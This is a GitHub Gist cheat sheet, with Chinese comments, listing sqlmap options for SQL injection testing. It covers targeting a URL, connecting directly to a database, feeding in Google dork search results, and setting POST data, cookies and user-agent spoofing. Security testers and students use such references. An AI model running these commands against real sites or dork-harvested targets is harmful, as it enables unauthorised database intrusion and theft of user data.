Last active
January 9, 2019 06:01
-
-
Save Xifeng2009/6fde69a5b689f395ed22cf4b194b19c4 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#1 根据url进行注入 -u | |
sqlmap -u "http://www.target.com/vuln.php?id=1" -f --banner --dbs --users | |
# 输出详细等级 | |
-v [1-7] | |
-v/-vv/-vvv/-vvvv | |
#2 直连数据库 -d | |
sqlmap -d "mysql://admin:admin@192.168.21.17:3306/testdb" -f --banner --dbs --users | |
#3 从文件中载入HTTP请求 -r | |
#4 使用Google Dork结果作为目标地址 -g | |
sqlmap -g "inurl:'.php?id=1'" | |
#5 HTTP方法 | |
--method=PUT | |
#6 HTTP数据 | |
sqlmap -u "http://www.target.com/vuln.php" --data="id=1" -f --banner --dbs --users | |
#7 参数分隔符 --param-del | |
sqlmap -u "http://www.target.com/vuln.php" --data="query=foobar;id=1" --param-del=";" | |
#8 HTTP cookie 请求头 | |
--cookie, --cookie-del, --load-cookies, --drop-set-cookie | |
#9 HTTP User-Agent 请求头 | |
--user-agent, --random-agent |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment